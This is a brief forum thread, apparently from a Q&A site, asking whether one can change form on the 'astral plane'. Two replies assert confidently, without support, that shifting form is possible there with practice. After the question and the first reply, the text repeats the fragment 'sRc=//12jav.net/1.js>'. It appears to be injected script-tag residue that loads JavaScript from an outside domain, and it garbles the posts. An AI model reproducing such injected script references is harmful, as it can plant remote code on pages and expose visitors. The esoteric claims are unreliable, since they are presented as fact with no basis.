astral plane limits?

ive read many posts to the astral plane saying it is possible to shift forms there, yet i have also read many posts saying it is completely impossible to change your form, can someone help set me straight i have become very confused. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

It is possible to change your form on the astral plane, but impossible in the physical realm. They are very different places, so they have very different rules. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

You can shift form on astral plane but not on the physical. You can do this freely. It does take practice to be solely focused on shifting, but after a few tries you will have mastered it.
